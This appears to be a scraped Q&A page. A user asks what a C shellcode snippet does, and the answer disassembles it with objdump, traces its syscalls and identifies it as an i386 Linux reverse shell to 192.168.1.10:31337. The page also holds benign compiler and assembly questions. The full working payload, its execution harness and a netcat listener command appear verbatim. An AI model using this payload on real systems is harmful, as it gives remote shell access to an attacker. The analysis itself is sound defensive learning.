What does this shellcode mean? - c

I found an interesting piece of code and ran it, and I wonder what this code does.
I'm worried that this code might harm my computer.
#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69)
*/
#define IPADDR "\xc0\xa8\x01\x0a" /* 192.168.1.10, one byte per octet */
#define PORT "\x7a\x69" /* 31337 == 0x7a69, high byte first */
/*
 * Raw i386 Linux machine code, 92 bytes without the trailing NUL of the
 * string literal. IPADDR and PORT are spliced into the byte stream through
 * adjacent string-literal concatenation, so they become the immediates of
 * the push instructions that build the socket address.
 *
 * Per the disassembly and strace output: it creates a TCP socket, connects
 * to IPADDR:PORT, issues syscall 0x3f three times for descriptors 2, 1, 0
 * (dup2 on i386), and finally issues syscall 0x0b (execve on i386) with the
 * pushed string "//bin/sh".
 */
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";
/*
 * Test harness: prints the payload length, then transfers control to the
 * bytes stored in code[].
 *
 * WARNING: calling ret() executes the payload itself. Only run this inside
 * an isolated sandbox or VM.
 *
 * Returns 0 if the payload ever returns to the caller.
 */
int main(void)
{
    /* sizeof yields a size_t, so the matching conversion is %zu, not %d;
     * the -1 drops the string literal's terminating NUL */
    printf("Shellcode Length: %zu\n", sizeof(code) - 1);

    /* reinterpret the data array as a function and call it */
    int (*ret)() = (int (*)())code;
    ret();
    return 0;
}
I don't know about shellcode

First, you should disassemble the code, for example by modifying the source to
#include <stdio.h>
#include <unistd.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69)
*/
#define IPADDR "\xc0\xa8\x01\x0a" /* 192.168.1.10, one byte per octet */
#define PORT "\x7a\x69" /* 31337 == 0x7a69, high byte first */
/*
 * The payload under inspection, kept byte-for-byte unchanged. In this
 * program it is only written out as data; nothing here executes it.
 * IPADDR and PORT are inserted by adjacent string-literal concatenation.
 */
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";
/*
 * Dump the raw payload bytes to standard output so they can be saved to a
 * file and disassembled offline. The payload is never executed.
 *
 * Returns 0 when every byte was written, 1 on a short or failed write.
 */
int main(void)
{
    /* drop the terminating NUL that the string literal appends */
    const size_t len = sizeof(code) - 1;
    ssize_t written = write(STDOUT_FILENO, code, len);

    /* a truncated dump would disassemble misleadingly, so report it */
    return (written == (ssize_t)len) ? 0 : 1;
}
$ gcc -O2 sc.c -o sc
$ ./sc > sc.bin
Now, you can use objdump to get the disassembled source (isa is obviously ia32):
$ objdump -bbinary -mi386 -D sc.bin
Disassembly of section .data:
00000000 <.data>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: b0 66 mov $0x66,%al
a: b3 01 mov $0x1,%bl
c: 51 push %ecx
d: 6a 06 push $0x6
f: 6a 01 push $0x1
11: 6a 02 push $0x2
13: 89 e1 mov %esp,%ecx
15: cd 80 int $0x80
17: 89 c6 mov %eax,%esi
19: b0 66 mov $0x66,%al
1b: 31 db xor %ebx,%ebx
1d: b3 02 mov $0x2,%bl
1f: 68 c0 a8 01 0a push $0xa01a8c0
24: 66 68 7a 69 pushw $0x697a
28: 66 53 push %bx
2a: fe c3 inc %bl
2c: 89 e1 mov %esp,%ecx
2e: 6a 10 push $0x10
30: 51 push %ecx
31: 56 push %esi
32: 89 e1 mov %esp,%ecx
34: cd 80 int $0x80
36: 31 c9 xor %ecx,%ecx
38: b1 03 mov $0x3,%cl
3a: fe c9 dec %cl
3c: b0 3f mov $0x3f,%al
3e: cd 80 int $0x80
40: 75 f8 jne 0x3a
42: 31 c0 xor %eax,%eax
44: 52 push %edx
45: 68 6e 2f 73 68 push $0x68732f6e
4a: 68 2f 2f 62 69 push $0x69622f2f
4f: 89 e3 mov %esp,%ebx
51: 52 push %edx
52: 53 push %ebx
53: 89 e1 mov %esp,%ecx
55: 52 push %edx
56: 89 e2 mov %esp,%edx
58: b0 0b mov $0xb,%al
5a: cd 80 int $0x80
Now you can start analyzing the disassembly. Most important are the syscalls (int $0x80): the syscall number is in register %eax (you can look up which syscall it is in the include file asm/unistd_32.h), and the parameters are in the other registers.
The more dangerous (and less reliable), but easier and faster way:
You can create some kind of sandbox (for example, a chrooted, unprivileged user on a Unix system, or even better, a VM) and run the code under "strace" to get an idea of what it does. However, this might be less reliable, since you cannot know for sure whether you are seeing the relevant code path: the behaviour may depend on the circumstances, or the code may use anti-debugging techniques.

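This shellcode is connect-back (reverse shell) shellcode: as the strace output below shows, it creates a TCP socket and connects to 192.168.1.10 on port 31337 rather than binding a local port. This kind of payload is commonly used in remote exploits.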
write(1, "Shellcode Length: 92\n", 21Shellcode Length: 92
) = 21
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(31337), sin_addr=inet_addr("192.168.1.10")}, 16
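Because the shellcode connects out to 192.168.1.10 (see the connect() call above), a listener has to be running on that machine before the code is started, for example with a command like nc -l -p 31337 (with BSD netcat: nc -l 31337).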
Of course, if you are familiar with this kind of shellcode, you can also do static analysis (such as disassembling it) on every byte of the shellcode.

Related

AFL-GCC compiles differently than GCC

I want to understand AFL's code instrumentation in detail.
Compiling a sample program sample.c
/* Returns 7 when at least one argument is passed (argc > 1), otherwise 12.
 * argv is not used. */
int main(int argc, char **argv) {
int ret = 0; /* placeholder; both branches below overwrite it */
if(argc > 1) {
ret = 7;
} else {
ret = 12;
}
return ret;
}
with gcc -c -o obj/sample-gcc.o src/sample.c and afl-gcc -c -o obj/sample-afl-gcc.o src/sample.c and disassembling both with objdump -d leads to different Assembly code:
[GCC]
0000000000000000 <main>:
0: f3 0f 1e fa endbr64
4: 55 push %rbp
5: 48 89 e5 mov %rsp,%rbp
8: 89 7d ec mov %edi,-0x14(%rbp)
b: 48 89 75 e0 mov %rsi,-0x20(%rbp)
f: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
16: 83 7d ec 01 cmpl $0x1,-0x14(%rbp)
1a: 7e 09 jle 25 <main+0x25>
1c: c7 45 fc 07 00 00 00 movl $0x7,-0x4(%rbp)
23: eb 07 jmp 2c <main+0x2c>
25: c7 45 fc 0c 00 00 00 movl $0xc,-0x4(%rbp)
2c: 8b 45 fc mov -0x4(%rbp),%eax
2f: 5d pop %rbp
30: c3 retq
[AFL-GCC]
0000000000000000 <main>:
0: 48 8d a4 24 68 ff ff lea -0x98(%rsp),%rsp
7: ff
8: 48 89 14 24 mov %rdx,(%rsp)
c: 48 89 4c 24 08 mov %rcx,0x8(%rsp)
11: 48 89 44 24 10 mov %rax,0x10(%rsp)
16: 48 c7 c1 0e ff 00 00 mov $0xff0e,%rcx
1d: e8 00 00 00 00 callq 22 <main+0x22>
22: 48 8b 44 24 10 mov 0x10(%rsp),%rax
27: 48 8b 4c 24 08 mov 0x8(%rsp),%rcx
2c: 48 8b 14 24 mov (%rsp),%rdx
30: 48 8d a4 24 98 00 00 lea 0x98(%rsp),%rsp
37: 00
38: f3 0f 1e fa endbr64
3c: 31 c0 xor %eax,%eax
3e: 83 ff 01 cmp $0x1,%edi
41: 0f 9e c0 setle %al
44: 8d 44 80 07 lea 0x7(%rax,%rax,4),%eax
48: c3 retq
AFL (usually) adds a trampoline in front of every basic block to track executed paths [https://github.com/mirrorer/afl/blob/master/afl-as.h#L130]
-> Instruction 0x00 lea until 0x30 lea
AFL (usually) adds a main payload to the program (which I excluded due to simplicity) [https://github.com/mirrorer/afl/blob/master/afl-as.h#L381]
AFL claims to use a wrapper for GCC, so I expected everything else to be equal. Why is the if-else-condition still compiled differently?
Bonus question: If a binary without source code available should be instrumented manually without using AFL's QEMU-mode or Unicorn-mode, can this be achieved by (naively) adding the main payload and each trampoline manually to the binary file or are there better approaches?
Re: Why the compilation with gcc and with afl-gcc is different, a short look at the afl-gcc source shows that by default it modifies the compiler parameters, setting -O3 -funroll-loops (as well as defining __AFL_COMPILER and FUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION).
According to the documentation (docs/env_variables.txt):
By default, the wrapper appends -O3 to optimize builds. Very rarely,
this will cause problems in programs built with -Werror, simply
because -O3 enables more thorough code analysis and can spew out
additional warnings. To disable optimizations, set AFL_DONT_OPTIMIZE.

Declare variable first or directly, is there a difference?

Is there a difference between declaring a variable first and then assigning a value or directly declaring and assigning a value in the compiled function? Does the compiled function do the same work? e.g, does it still read the parameters, declare variables and then assign value or is there a difference between the two examples in the compiled versions?
example:
/* Variant 1: declare with a placeholder initializer, then assign.
 * NOTE(review): NULL is a null pointer constant, while extvalue is declared
 * as u32 (presumably an unsigned 32-bit integer typedef; confirm). */
void foo(u32 value) {
u32 extvalue = NULL; /* overwritten on the next line before any read */
extvalue = value;
}
compared with
/* Variant 2: declare the local and initialize it from the parameter in a
 * single step. */
void foo(u32 value) {
u32 extvalue = value; /* not read again within this snippet */
}
I am under the impression that there is no difference between those two functions if you look at the compiled code, e.g they will look the same and i will not be able to tell which is which.
it depends on the compiler & the optimization level of course.
A dumb compiler/low optimization level when it sees:
u32 extvalue = NULL;
extvalue = value;
could set to NULL then to value in the next line.
Since extvalue isn't used in-between, the NULL initialization is useless and most compilers directly set to value as an easy optimization
Note that declaring a variable isn't really an instruction per se. The compiler just allocates auto memory to store this variable.
I've tested a simple piece of code with and without the initialization, and the result is different when using the gcc 6.2.1 compiler with the -O0 (don't optimize anything) flag:
#include <stdio.h>
/* Test case with a redundant initializer: extvalue is set to 0 and then
 * overwritten with value before it is printed. */
void foo(int value) {
int extvalue = 0; /* replaced on the next line before any read */
extvalue = value;
printf("%d",extvalue);
}
disassembled:
Disassembly of section .text:
00000000 <_foo>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 28 sub $0x28,%esp
6: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp) <=== here we see the init
d: 8b 45 08 mov 0x8(%ebp),%eax
10: 89 45 f4 mov %eax,-0xc(%ebp)
13: 8b 45 f4 mov -0xc(%ebp),%eax
16: 89 44 24 04 mov %eax,0x4(%esp)
1a: c7 04 24 00 00 00 00 movl $0x0,(%esp)
21: e8 00 00 00 00 call 26 <_foo+0x26>
26: c9 leave
27: c3 ret
now:
/* Same test case without the initializer: extvalue is assigned exactly once
 * before it is printed. */
void foo(int value) {
int extvalue; /* no initializer; first written on the next line */
extvalue = value;
printf("%d",extvalue);
}
disassembled:
Disassembly of section .text:
00000000 <_foo>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 28 sub $0x28,%esp
6: 8b 45 08 mov 0x8(%ebp),%eax
9: 89 45 f4 mov %eax,-0xc(%ebp)
c: 8b 45 f4 mov -0xc(%ebp),%eax
f: 89 44 24 04 mov %eax,0x4(%esp)
13: c7 04 24 00 00 00 00 movl $0x0,(%esp)
1a: e8 00 00 00 00 call 1f <_foo+0x1f>
1f: c9 leave
20: c3 ret
21: 90 nop
22: 90 nop
23: 90 nop
The 0 initialization has disappeared here, which shows that at -O0 the compiler did not optimize away the initialization in the first version.
If I switch to -O2 (good optimization level) the code is then identical in both cases, compiler found that the initialization wasn't necessary (still, silent, no warnings):
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 18 sub $0x18,%esp
6: 8b 45 08 mov 0x8(%ebp),%eax
9: c7 04 24 00 00 00 00 movl $0x0,(%esp)
10: 89 44 24 04 mov %eax,0x4(%esp)
14: e8 00 00 00 00 call 19 <_foo+0x19>
19: c9 leave
1a: c3 ret
I tried these functions in godbolt:
/* Initializes extvalue with NULL, then overwrites it with value. */
void foo(uint32_t value)
{
uint32_t extvalue = NULL; /* NULL is a pointer constant; extvalue is an integer */
extvalue = value;
}
/* Initializes extvalue directly from value, with no intermediate store. */
void bar(uint32_t value)
{
uint32_t extvalue = value;
}
I ported to the actual type uint32_t rather than u32 which is not standard. The resulting non-optimized assembly generated by x86-64 GCC 6.3 is:
foo(unsigned int):
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-20], edi
mov DWORD PTR [rbp-4], 0
mov eax, DWORD PTR [rbp-20]
mov DWORD PTR [rbp-4], eax
nop
pop rbp
ret
bar(unsigned int):
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-20], edi
mov eax, DWORD PTR [rbp-20]
mov DWORD PTR [rbp-4], eax
nop
pop rbp
ret
So clearly the non-optimized code retains the (weird, as pointed out by others since it's not written to a pointer) NULL assignment, which is of course pointless.
I'd vote for the second one since it's shorter (less to hold in one's head when reading the code), and never allow/recommend the pointless setting to NULL before overwriting with the proper value. I would consider that a bug, since you're saying/doing something you don't mean.

Meaning of DISP32 in objdump output

I'm trying to understand how string literals in C get translated into assembly.
I have a very simple C program:
/* Minimal program: stores the address of the string literal "test" in a
 * local pointer and does nothing else with it. */
int main() {
char* c = "test"; /* c is never read */
}
Creating the object file (gcc -c test.c) and disassembling it via objdump (gobjdump -SrxD test.o) yields the following:
0000000000000000 <_main>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: 31 c0 xor %eax,%eax
6: 48 8d 0d 00 00 00 00 lea 0x0(%rip),%rcx # d <_main+0xd>
9: DISP32 L_.str
d: 48 89 4d f8 mov %rcx,-0x8(%rbp)
11: 5d pop %rbp
12: c3 retq
0000000000000013 <L_.str>:
13: 74 65 je 7a <L_.str+0x67>
15: 73 74 jae 8b <L_.str+0x78>
In the disassembled output it's unclear what 9: DISP32 L_.str means. I also noticed that the corresponding machine code is missing. What exactly is this line doing?

Is it possible to interrupt evaluation of an expression

Consider the following piece of code.
#include <stdio.h>
/*
 * Increment the two integers that x and y point to, one after the other.
 * The two updates are separate statements, each its own read-modify-write
 * of a different object; nothing here makes the pair a single atomic step.
 */
void f(int *x, int *y)
{
    (*x)++;
    (*y)++;
}
/* Driver: calls f() once on two locals that both start at 5. */
int main()
{
    int x = 5;
    int y = 5;

    f(&x, &y);

    return 0;
}
I know that the function f is not reentrant. One of the stupid things I am thinking is to do (*x)++ + (*y)++ in one line and discard the sum. I wonder that multiple assembly instructions will be generated for evaluation of this expression. Will the interrupt be served in between evaluation of expression?
You won't get anything atomic with that...
c.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: 48 89 7d f8 mov %rdi,-0x8(%rbp)
8: 48 89 75 f0 mov %rsi,-0x10(%rbp)
c: 48 8b 45 f8 mov -0x8(%rbp),%rax
10: 8b 00 mov (%rax),%eax
12: 8d 50 01 lea 0x1(%rax),%edx
15: 48 8b 45 f8 mov -0x8(%rbp),%rax
19: 89 10 mov %edx,(%rax)
1b: 48 8b 45 f0 mov -0x10(%rbp),%rax
1f: 8b 00 mov (%rax),%eax
21: 8d 50 01 lea 0x1(%rax),%edx
24: 48 8b 45 f0 mov -0x10(%rbp),%rax
28: 89 10 mov %edx,(%rax)
2a: 5d pop %rbp
2b: c3 retq
And it gets a lot better with -O2, but still it's not atomic.
c.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 83 07 01 addl $0x1,(%rdi)
3: 83 06 01 addl $0x1,(%rsi)
6: c3 retq
And, at least for GCC, the exact same code is generated for (*x)++ + (*y)++. Anyway, could you elaborate a little bit on your question? It is too broad, and this code is reentrant as long as x and y are not the same on different entries. Otherwise, you should give us more details about what you're intending.
Edit: It's (apparently, unless there's some hidden black magic...) impossible to do such a thing atomically on a x86(-64) architecture. Anyway, it's non-portable to consider an operation "atomic" if it is done in a single instruction. That's specific to x86(-64) CPUs.

analyzing i386 assembled function... line by line

Hi, I'm a newbie in the assembly and OS world, and yes, this is my homework, on which I'm stuck deep in the dark of the i386 manual. Please help me or give me some hints. Here's the code I have to analyze line by line. This function is part of EOS (educational OS) and deals with interrupt requests in the HAL (hardware abstraction layer). I ran "objdump -d interrupt.o" and got this assembly code, for i386 of course.
00000000 <eos_ack_irq>:
0: 55 push %ebp ; push %ebp to stack to save stack before
1: b8 fe ff ff ff mov $0xfffffffe,%eax ; what is this??
6: 89 e5 mov %esp,%ebp ; couple with "push %ebp". known as prolog assembly function.
8: 8b 4d 08 mov 0x8(%ebp),%ecx ; set %ecx as value of (%ebp+8)...and what is this do??
b: 5d pop %ebp ; pop the top of stack to %ebp. i know this is for getting back to callee..
c: d3 c0 rol %cl,%eax ; ????? what is this for???
e: 21 05 00 00 00 00 and %eax,0x0 ; make %eax as 0. for what??
14: c3 ret ; return what register??
00000015 <eos_get_irq>:
15: 8b 15 00 00 00 00 mov 0x0,%edx
1b: b8 1f 00 00 00 mov $0x1f,%eax
20: 55 push %ebp
21: 89 e5 mov %esp,%ebp
23: 56 push %esi
24: 53 push %ebx
25: bb 01 00 00 00 mov $0x1,%ebx
2a: 89 de mov %ebx,%esi
2c: 88 c1 mov %al,%cl
2e: d3 e6 shl %cl,%esi
30: 85 d6 test %edx,%esi
32: 75 06 jne 3a <eos_get_irq+0x25>
34: 48 dec %eax
35: 83 f8 ff cmp $0xffffffff,%eax
38: 75 f0 jne 2a <eos_get_irq+0x15>
3a: 5b pop %ebx
3b: 5e pop %esi
3c: 5d pop %ebp
3d: c3 ret
0000003e <eos_disable_irq_line>:
3e: 55 push %ebp
3f: b8 01 00 00 00 mov $0x1,%eax
44: 89 e5 mov %esp,%ebp
46: 8b 4d 08 mov 0x8(%ebp),%ecx
49: 5d pop %ebp
4a: d3 e0 shl %cl,%eax
4c: 09 05 00 00 00 00 or %eax,0x0
52: c3 ret
00000053 <eos_enable_irq_line>:
53: 55 push %ebp
54: b8 fe ff ff ff mov $0xfffffffe,%eax
59: 89 e5 mov %esp,%ebp
5b: 8b 4d 08 mov 0x8(%ebp),%ecx
5e: 5d pop %ebp
5f: d3 c0 rol %cl,%eax
61: 21 05 00 00 00 00 and %eax,0x0
67: c3 ret
and here's pre-assembled C code
/*
 * Acknowledge the specified irq by clearing its bit in the _irq_pending
 * register.
 *
 * irq is used as a bit position and must be smaller than the bit width of
 * unsigned int; larger shift counts are undefined behaviour.
 */
void eos_ack_irq(int32u_t irq) {
    /* unsigned mask: left-shifting a signed 1 into the sign bit
     * (irq == 31 with a 32-bit int) is undefined behaviour */
    _irq_pending &= ~(1u << irq);
}
/*
 * Get the irq number: the position of the highest set bit among bits 31..0
 * of the _irq_pending register.
 *
 * Returns that bit position, or -1 when none of those bits is set.
 */
int32s_t eos_get_irq() {
    /* scan downwards from bit 31 so the highest set bit wins */
    int i = 31;
    for (; i >= 0; i--) {
        /* unsigned mask: 0x1 << 31 on a signed 32-bit int is undefined
         * behaviour */
        if (_irq_pending & (1u << i)) {
            return i;
        }
    }
    return -1;
}
/*
 * Mask an irq by turning on its bit in _irq_mask.
 *
 * irq is used as a bit position and must be smaller than the bit width of
 * unsigned int; larger shift counts are undefined behaviour.
 */
void eos_disable_irq_line(int32u_t irq) {
    /* unsigned mask: left-shifting a signed 1 into the sign bit
     * (irq == 31 with a 32-bit int) is undefined behaviour */
    _irq_mask |= (1u << irq);
}
/*
 * Unmask an irq by turning off its bit in _irq_mask.
 *
 * irq is used as a bit position and must be smaller than the bit width of
 * unsigned int; larger shift counts are undefined behaviour.
 */
void eos_enable_irq_line(int32u_t irq) {
    /* unsigned mask: left-shifting a signed 1 into the sign bit
     * (irq == 31 with a 32-bit int) is undefined behaviour */
    _irq_mask &= ~(1u << irq);
}
so these functions do ack and get and mask and unmask an interrupt request. and i'm stuck at the first one. so if you are mercy enough, would you please get me some hint or answer to analyze the first function? i'll try to get the others... and i'm very sorry for another homework.. (my TA doesn't look email)
21 05 00 00 00 00 (that and) is actually an and with a memory operand (namely and [0], eax) which the AT&T syntax obscures (but technically it does say that, note the absence of a $ sign). It makes more sense that way (the offset of 0 suggests you didn't link the code before disassembling).
mov $0xfffffffe, %eax is doing exactly what it looks like it's doing (note that 0xfffffffe is all ones except the lowest bit), and that means the function has been implemented like this:
_irq_pending &= rotate_left(0xFFFFFFFE, irq);
Saving a not operation. It has to be a rotate there instead of a shift in order to make the low bits 1 if necessary.

Resources